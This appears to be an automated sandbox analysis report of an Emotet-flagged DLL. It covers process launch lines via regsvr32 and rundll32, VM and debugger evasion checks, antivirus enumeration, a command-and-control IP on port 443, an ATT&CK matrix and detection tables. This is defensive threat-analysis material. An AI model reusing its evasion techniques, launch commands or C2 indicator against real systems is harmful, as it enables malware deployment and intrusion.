                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180007B3F push esp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D47BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,
                      Source: 1Klocu2k7B.dllStatic PE information: real checksum: 0x85ab6 should be: 0x8797e
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1Klocu2k7B.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\JRkpZLNCkFz\TYmfFCbFTVEkATZ.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\JRkpZLNCkFz\TYmfFCbFTVEkATZ.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\FkiSBxnaCpKFac\aiKDrVTCy.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\YXTYrsWm\dnJuCUbKH.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Windows\System32\svchost.exe TID: 3720Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6180Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6908Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 160Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumServicesStatusExW,
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 00000017.00000002.808556944.0000023D99854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: regsvr32.exe, 00000007.00000002.807577949.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368846943.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                      Source: svchost.exe, 0000000E.00000002.672841649.000001CDC5465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: svchost.exe, 00000017.00000002.807966634.0000023D988B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWsettings-windata.microsoft.com
                      Source: svchost.exe, 00000017.00000002.808556944.0000023D99854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
                      Source: svchost.exe, 00000017.00000002.807937565.0000023D988A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                      Source: svchost.exe, 00000005.00000002.807268928.00000266C2002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: regsvr32.exe, 00000007.00000003.369126125.0000000000BD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368897361.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.807938646.0000000000BD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368846943.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.672829483.000001CDC5454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.672485516.000001CDC4029000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.808004103.0000023D988CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.630884573.000001C02E0AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.589247283.000001C02E0CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.630957740.000001C02E0E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: regsvr32.exe, 00000007.00000003.369126125.0000000000BD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368897361.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.807938646.0000000000BD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.368846943.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg
                      Source: svchost.exe, 00000017.00000002.807937565.0000023D988A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: svchost.exe, 00000017.00000002.807937565.0000023D988A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                      Source: svchost.exe, 00000017.00000002.807937565.0000023D988A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                      Source: svchost.exe, 00000017.00000002.807607077.0000023D98862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW .
                      Source: svchost.exe, 00000017.00000002.807937565.0000023D988A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: svchost.exe, 00000017.00000002.807937565.0000023D988A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000017.00000002.807937565.0000023D988A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                      Source: svchost.exe, 00000005.00000002.807490619.00000266C2028000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.807506991.0000026249842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.807466958.000001F77CA29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D46550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D47BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D46550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D420E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D44558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D4E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000017.00000002.808496047.0000023D991F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                      Source: svchost.exe, 0000000F.00000002.807485664.000001CC26502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e219be0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2490000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e219be0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1fdec700000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1fdec700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1f1cbe10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1f1cbe10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2490000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.rundll32.exe.1f1cbe10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.298205207.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808360106.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.329868359.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808194532.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.298619833.000001FDEC700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.299143403.000001E219BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.329600804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.304106272.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.303897214.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.304900388.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.302181503.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.298411789.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.301146788.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.305651593.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      2
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory151
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)13
                      Virtualization/Sandbox Evasion
                      Security Account Manager13
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets1
                      System Service Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32
                      DCSync2
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc Filesystem34
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626501 Sample: 1Klocu2k7B Startdate: 14/05/2022 Architecture: WINDOWS Score: 84 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected Emotet 2->48 7 loaddll64.exe 1 2->7         started        9 svchost.exe 2->9         started        12 svchost.exe 2->12         started        14 10 other processes 2->14 process3 dnsIp4 17 regsvr32.exe 5 7->17         started        20 cmd.exe 1 7->20         started        22 rundll32.exe 2 7->22         started        24 rundll32.exe 7->24         started        50 Changes security center settings (notifications, updates, antivirus, firewall) 9->50 26 MpCmdRun.exe 1 9->26         started        52 Query firmware table information (likely to detect VMs) 12->52 40 127.0.0.1 unknown unknown 14->40 signatures5 process6 signatures7 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->42 28 regsvr32.exe 17->28         started        32 rundll32.exe 2 20->32         started        34 WerFault.exe 20 9 24->34         started        36 conhost.exe 26->36         started        process8 dnsIp9 38 23.239.0.12, 443, 49754 LINODE-APLinodeLLCUS United States 28->38 54 System process connects to network (likely due to code injection or exploit) 28->54 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->56 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      1Klocu2k7B.dll32%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      6.0.rundll32.exe.1f1cbe10000.4.unpack100%AviraHEUR/AGEN.1215493Download File
                      7.2.regsvr32.exe.2490000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      6.0.rundll32.exe.1f1cbe10000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.1fdec700000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      4.2.rundll32.exe.1e219be0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      6.2.rundll32.exe.1f1cbe10000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      2.2.regsvr32.exe.6e0000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://23.239.0.12/&100%Avira URL Cloudmalware
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.331292008.000001430AC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331303065.000001430AC4B000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000002.331313344.000001430AC53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330667118.000001430AC4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000003.330825032.000001430AC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.330844563.000001430AC41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.331297688.000001430AC42000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.330766654.000001430AC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.330805452.000001430AC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.308527918.000001430AC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
